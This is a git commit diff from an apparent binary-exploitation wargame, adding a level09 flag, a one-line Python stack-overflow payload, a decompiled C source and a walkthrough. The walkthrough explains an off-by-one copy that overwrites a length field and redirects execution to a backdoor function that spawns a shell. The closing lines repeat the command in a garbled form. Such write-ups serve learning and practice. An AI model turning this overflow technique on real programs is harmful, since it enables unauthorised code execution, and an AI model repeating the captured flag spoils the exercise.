level05: done (exploit modified to a better shellcode)

level07: walkthrough done level08: done level09: done
2025-05-15 14:00:44 +02:00
parent 4a88b55e23
commit a3ea938eb1
12 changed files with 74 additions and 29 deletions
--- a/level09/flag
+++ b/level09/flag
@ -0,0 +1 @@
+j4AunAPDXaJxxWjYEUxpanmvSgRDV3tpA5BEaBuE
--- a/level09/ressources/exploit
+++ b/level09/ressources/exploit
@ -0,0 +1 @@
+ (python -c 'print "A"*40 + "\xff\n" + "A"*200 + "\x00\x00\x55\x55\x55\x55\x48\x8c"[::-1]'; cat) | ./level09
--- a/level09/source.c
+++ b/level09/source.c
@ -27,25 +27,25 @@ int handle_msg(void)

 char *set_msg(char *msg, int len)
 {
-	char s[1024];
+	char buff[1024];

-	memset(s, 0, sizeof(s));
+	memset(buff, 0, sizeof(buff));
 	puts(">: Msg @Unix-Dude");
 	printf(">>: ");
-	fgets(s, 1024, stdin);
-	return strncpy((char *)msg, s, len);
+	fgets(buff, 1024, stdin);
+	return strncpy(msg, buff, len);
 }

 int set_username(char *username)
 {
-	char s[140];
+	char buff[140];

-	memset(s, 0, 128);
+	memset(buff, 0, 128);
 	puts(">: Enter your username");
 	printf(">>: ");
-	fgets(s, 128, stdin);
-	for (int i = 0; i <= 40 && s[i]; ++i)
-		username[i] = s[i];
+	fgets(buff, 128, stdin);
+	for (int i = 0; i <= 40 && buff[i]; ++i)
+		username[i] = buff[i];
 	return printf(">: Welcome, %s", username);
 }

--- a/level09/walkthrough
+++ b/level09/walkthrough
@ -0,0 +1,15 @@
+# Level09
+
+Using hexrays, we can decompile the code.
+Here we have 4 functions:
+- `handle_msg()` => has 3 variables on the stack. The first one is `char msg[140]`, the second one is `char username[40]` and the last one is `int len = 140`.
+It calls `set_username(username)` and then `set_msg(msg, len)`.
+- `set_username()` => write the username through stdin. 
+- `set_msg()` => write the message through stdin in a buffer of 1024 bytes, then copies its content with an `strncpy(msg, buff, len)`
+The 4th function is a "secret" function called `secret_backdoor()` which is our goal since it `fgets()` and gives our input to `system()`, thus allowing us to run `"/bin/sh"`.
+There is 1 main vulnerability in this program. In the `set_username()` function, `char *username` is being written to through `fgets(buff, 128, stdin)`, then copy the content of `buff` to `username` through a loop whose stop condition is `i <= 40`. But username has a size of 40 bytes, after what we overflow onto `int len`. Since it allows us to overflow on `len`, we can exploit this to then overflow the `fgets()` in `set_msg()`. We're going to put a value of `0xff` in len and hope it will be enough to overflow on `eip`.
+Using iterations we found the offset between `msg` and `eip` to be 200 bytes.
+What we want to do here is fill the stack with 200 bytes and then put the address of our function `secret_backdoor()` in `eip`.
+
+Here is the command:
+`(python -c 'print "A"*40 + "\xff\n" + "A"*200 + "\x00\x00\x55\x55\x55\x55\x48\x8c"[::-1]"; cat) | ./level09`
				`@ -0,0 +1 @@`
				`(python -c 'print "A"40 + "\xff\n" + "A"200 + "\x00\x00\x55\x55\x55\x55\x48\x8c"[::-1]'; cat) \| ./level09`